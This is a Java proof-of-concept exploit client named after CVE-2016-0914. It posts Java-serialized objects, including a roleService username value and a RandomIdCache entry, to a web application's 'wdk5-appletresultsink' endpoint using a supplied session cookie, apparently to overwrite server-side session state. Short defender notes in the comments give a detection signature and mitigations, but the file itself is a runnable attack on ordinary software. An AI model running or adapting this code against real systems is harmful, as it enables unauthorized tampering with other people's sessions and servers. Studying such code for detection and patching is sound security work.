import java.io.ObjectOutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import com.documentum.web.security.RandomIdCache;
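/**
 * Proof-of-concept client, named after CVE-2016-0914, that POSTs Java-serialized objects to the
 * {@code wdk5-appletresultsink} path of a web application using a caller-supplied session id.
 *
 * <p>What the code visibly sends, in two separate requests:
 * <ol>
 *   <li>the string {@code <docbase>.dctm.roleService.username} followed by the docbase name;</li>
 *   <li>the string {@code RandomIdCache} followed by a {@code RandomIdCache} instance holding the
 *       single entry {@code "0" -> null}.</li>
 * </ol>
 * NOTE(review): the name/value pairing suggests the sink stores each received value under the
 * preceding name (presumably as session state); the server side is not shown here, so confirm
 * against the vendor advisory for the CVE.
 *
 * <p>Reviewer notes for defenders:
 * <ul>
 *   <li>Request bodies produced by {@link java.io.ObjectOutputStream} begin with the Java
 *       serialization stream header ({@code AC ED 00 05}); a POST to a path ending in
 *       {@code wdk5-appletresultsink} carrying that header is the stable observable. The
 *       {@code Content-Type: pwned} value is just a literal in this file and should not be relied
 *       on as the only signature.</li>
 *   <li>An endpoint that accepts serialized objects from clients should constrain accepted classes
 *       (for example with {@code java.io.ObjectInputFilter}) and must not let client-supplied
 *       values replace server-owned state; apply the vendor fix for the referenced CVE.</li>
 * </ul>
 *
 * @author Andrey B. Panfilov <andrey@panfilov.tel>
 */
public class CVE20160914POC {

    /**
     * Sends the two requests described in the class comment.
     *
     * @param args {@code args[0]} base URL of the web application, {@code args[1]} docbase name,
     *     {@code args[2]} value for the {@code JSESSIONID} cookie
     * @throws IllegalArgumentException if fewer than three arguments are supplied
     * @throws Exception on any connection or serialization failure
     */
    public static void main(String[] args) throws Exception {
        // Fail with a readable message instead of an ArrayIndexOutOfBoundsException.
        if (args == null || args.length < 3) {
            throw new IllegalArgumentException("usage: CVE20160914POC <url> <docbase> <jsessionId>");
        }
        String url = args[0];
        String docbase = args[1];
        String jsessionId = args[2];

        // Request 1: a name string followed by the docbase name as its value.
        sendRequest(url, jsessionId, docbase + ".dctm.roleService.username", docbase);

        // Request 2: the name "RandomIdCache" followed by a cache whose only entry is "0" -> null.
        RandomIdCache cache = new RandomIdCache();
        cache.put(String.valueOf(0), null);
        sendRequest(url, jsessionId, "RandomIdCache", cache);
    }

    /**
     * POSTs {@code data} as a single Java serialization stream to the sink URL derived from
     * {@code url} and prints the HTTP response code.
     *
     * @param url base URL of the web application (see {@link #makeUrl(String)})
     * @param jsessionId value sent as the {@code JSESSIONID} cookie
     * @param data objects written to the request body, in order, with {@code writeObject}
     * @throws Exception on any connection or serialization failure
     */
    public static void sendRequest(String url, String jsessionId, Object... data) throws Exception {
        HttpURLConnection conn = (HttpURLConnection) new URL(makeUrl(url)).openConnection();
        try {
            conn.setRequestProperty("Content-Type", "pwned");
            conn.setRequestMethod("POST");
            conn.setUseCaches(false);
            conn.setDoOutput(true);
            conn.setRequestProperty("Cookie", "JSESSIONID=" + jsessionId);

            // try-with-resources closes the stream even when writeObject throws; the original
            // leaked it on failure. getOutputStream() already opens the connection, so the
            // original's later connect() call had no effect and is dropped.
            try (ObjectOutputStream oos = new ObjectOutputStream(conn.getOutputStream())) {
                for (Object o : data) {
                    oos.writeObject(o);
                }
                oos.flush();
            }

            System.out.println("Response code for " + url + " was: " + conn.getResponseCode());
        } finally {
            // Release the underlying socket whether or not the request succeeded.
            conn.disconnect();
        }
    }

    /**
     * Appends the sink path {@code wdk5-appletresultsink} to {@code url}, inserting a {@code /}
     * separator when {@code url} does not already end with one.
     *
     * @param url base URL of the web application; must not be {@code null}
     * @return {@code url} followed by the sink path
     */
    public static String makeUrl(String url) {
        String base = url.endsWith("/") ? url : url + "/";
        return base + "wdk5-appletresultsink";
    }
}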